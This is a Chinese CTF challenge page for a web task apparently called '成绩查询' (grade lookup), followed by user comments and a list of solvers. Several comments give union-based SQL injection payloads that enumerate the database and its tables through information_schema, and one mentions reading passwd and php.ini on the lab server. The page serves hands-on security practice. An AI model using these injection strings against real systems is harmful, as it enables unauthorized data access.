成绩查询WEB 未解决

分数: 25 金币: 2
题目作者: 未知
一  血: npfs
一血奖励: 1金币
解  决: 11823
提  示:
描  述:
来源山科大ctf
评论
xiaohaisec 2年前

1'报错 1"不报错,所以使用' 查询数据表 -1' union select 1,database(),group_concat(table_name),4 from information_schema.tables where table_schema=database()# sc fl4g 查询表的字段名 -1' union select 1,databa

回复 0

n0pass 2年前

启动环境以后网页打不开啊。。。。。。退钱

回复 0
harry 管理员 2年前

已修复,金币退了

回复 2

老渡真的不懂 2年前

环境有点问题,有时能用有时不能用。试了一下passwd,group,php.ini能看,像我这样的菜鸟也就看看,做不了什么,大神恐怕随随便便就能破坏环境,感觉权限给高了。环境总出问题不会是大佬进去搞破坏了吧?

回复 1

samRsa 2年前

这题也太简单了

回复 0

逐月 2年前

一尝试注入就链接被重置,我真的被气得头疼

回复 1

逐月 2年前

烦死了烦死了一sql注入就页面一直转,然后链接被中断,这是在干什么。。

回复 1

ls666 2年前

首先爆库名:通过id=-1' union select 1,2,3,database()#得到数据库名字skctf_flag; 然后爆表:通过使用 id=-1' union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()# 得到表名:fl4g,sc

回复 1
xiashuidao 2年前

id=-1‘ union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database()-- -

回复 1

diverpan 2年前

进不去的????退钱!!!!

回复 0

nobodytian 2年前

出现三个端口,用最后一个端口可以使用

回复 0

zh5507158 2年前

怎么三个端口号

回复 0

WriteUp

image
harry

2 金币

评分(24)

解题动态

L! 攻破了该题 5小时前
box 攻破了该题 8小时前
911 攻破了该题 18小时前
LHM 攻破了该题 19小时前
yue 攻破了该题 19小时前
HZ 攻破了该题 19小时前
wyc 攻破了该题 19小时前
小蓝01 攻破了该题 19小时前
wh 攻破了该题 19小时前
diffni 攻破了该题 19小时前
dianci 攻破了该题 19小时前
cww 攻破了该题 19小时前
qyy 攻破了该题 19小时前
ghj 攻破了该题 19小时前
_T_ 攻破了该题 19小时前
lkgjlkglkw 攻破了该题 20小时前
popppyy 攻破了该题 20小时前
hyxi 攻破了该题 20小时前
Pisces_11z 攻破了该题 20小时前
jay cat 攻破了该题 20小时前
问题反馈